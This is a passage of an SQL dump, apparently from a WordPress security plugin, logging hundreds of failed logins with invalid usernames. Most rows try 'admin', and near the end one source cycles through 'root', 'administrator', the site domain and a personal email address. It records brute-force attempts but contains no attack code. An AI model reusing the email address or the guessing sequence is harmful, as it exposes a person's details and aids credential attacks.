Gecko/20100101 Firefox/62.0'),(5377,8120,1629444112.773582,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5378,8122,1629444480.999731,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^+.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5379,8123,1629444862.681096,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5380,8124,1629445253.059735,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/d�?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5381,8126,1629445617.214403,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5382,8127,1629445879.550174,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��A\0�&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5383,8128,1629445992.567609,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H\n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5384,8129,1629446374.339735,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5385,8130,1629446763.762128,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5386,8133,1629447527.426362,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���AA�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5387,8134,1629447981.798622,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5388,8136,1629448773.906977,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����R{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5389,8137,1629449211.896649,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-wS�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5390,8137,1629449211.943773,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-wS�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5391,8142,1629450912.683738,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/k!\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5392,8149,1629453104.558104,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��4��~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5393,8151,1629453981.537963,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��{9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5394,8153,1629454465.192290,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5395,8155,1629455376.235339,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5396,8157,1629456044.439593,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36'),(5397,8158,1629456326.337253,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5398,8160,1629457267.249647,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���VBe','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5399,8166,1629459683.388242,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-@6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5400,8167,1629460186.117493,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��˖0v','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5401,8170,1629461171.433526,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��+�Hu','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5402,8171,1629461690.315085,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Օg�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5403,8173,1629462205.694929,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H\"\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5404,8175,1629462713.944727,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��A<�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5405,8176,1629463199.158256,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���_l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5406,8178,1629463746.418339,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5407,8181,1629464772.713808,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g��R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5408,8182,1629465294.161110,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5409,8183,1629465785.684587,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@v7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5410,8189,1629470125.748332,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(5411,8193,1629476289.191242,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ghIo','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(5412,8195,1629476984.036694,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5413,8197,1629477849.266190,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����m','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(5414,8198,1629478665.744918,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���c{)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5415,8199,1629479410.644306,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Z�&','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5416,8200,1629479466.954710,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���i','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5417,8201,1629480083.049371,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����Q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5418,8202,1629480714.695955,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��P��o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5419,8203,1629480999.585094,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QX4\Z','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(5420,8204,1629481275.115838,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5421,8205,1629481861.013749,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5422,8206,1629482416.882728,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��w4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5423,8207,1629482651.040204,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���9�8','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(5424,8208,1629483031.044327,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gx�V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5425,8210,1629484196.366077,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5426,8211,1629484787.697437,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��.e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5427,8211,1629484787.792139,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��.e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5428,8212,1629485957.131066,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����C-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5429,8213,1629485963.679339,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����8�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(5430,8214,1629486559.453886,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5431,8215,1629487123.558469,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���˰R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5432,8216,1629487622.165456,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���]n\'','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5433,8216,1629487622.190256,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���]n\'','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5434,8217,1629487689.611692,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5435,8217,1629487689.629580,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5436,8218,1629488274.443475,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5437,8219,1629488897.960273,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5438,8220,1629489254.820971,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���H�%','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(5439,8221,1629489584.604896,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���c\no','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5440,8222,1629490202.988804,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��+�Hu','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5441,8223,1629490841.999048,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5442,8224,1629490876.888971,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/sM�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5443,8225,1629491527.266470,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h�-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5444,8226,1629492245.520687,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5445,8228,1629492983.309335,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5446,8229,1629493690.951026,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��νUX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5447,8230,1629494108.000115,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�ڲ','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(5448,8231,1629494476.246426,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5449,8232,1629495251.308424,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ár�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5450,8235,1629496853.489096,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@rP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5451,8236,1629497330.745792,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����^�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(5452,8237,1629497711.729798,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5453,8238,1629498551.935259,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��� �A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5454,8239,1629498951.638658,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����*}','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(5455,8242,1629500552.011067,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QX4r','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5456,8244,1629502061.575797,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��o]5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5457,8245,1629502164.671996,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���n\\�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(5458,8247,1629503767.613100,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(5459,8250,1629505382.501542,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@o~ ','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5460,8253,1629507000.969637,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\\�','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5461,8254,1629507855.706505,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���R-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5462,8258,1629510961.934681,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5463,8259,1629511880.277606,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��M��)','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(5464,8263,1629514240.564733,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5465,8264,1629515396.114238,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Gڿ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5466,8266,1629516784.569630,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Oa�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(5467,8269,1629519516.473007,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k��\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5468,8270,1629520633.057613,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5469,8272,1629522041.785646,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3&P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5470,8274,1629523363.756396,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��|��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5471,8275,1629523943.855838,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���=��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(5472,8276,1629524692.056878,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5473,8279,1629527242.376766,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Kw�\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5474,8280,1629527265.119005,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(5475,8281,1629528035.530022,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��6%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5476,8282,1629528663.539618,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5477,8283,1629529307.935374,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5478,8286,1629530626.930532,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�\Z','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(5479,8287,1629531165.705670,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����Q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5480,8289,1629532258.708534,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ܧe','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5481,8290,1629532359.568061,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3D�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5482,8290,1629532359.663983,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3D�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5483,8291,1629532989.534162,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����\\','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5484,8292,1629533582.582008,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��M\'f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5485,8293,1629533883.382251,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����l','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5486,8294,1629534158.624626,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5487,8295,1629534750.496174,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����K�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5488,8296,1629535364.845450,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��B�S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5489,8297,1629535498.769461,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���옔','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(5490,8298,1629536564.843360,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��n-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5491,8299,1629537133.978455,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3Kȷ','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5492,8300,1629537188.804575,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���� �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5493,8301,1629537248.157006,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���&$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5494,8302,1629537250.580573,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0���&$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5495,8303,1629537252.692373,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0���&$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5496,8304,1629537255.119257,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0���&$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5497,8305,1629537257.300414,1,'loginFailInvalidUsername','marc@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0���&$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5498,8306,1629537259.476318,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0���&$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5499,8307,1629537261.628325,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0���&$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 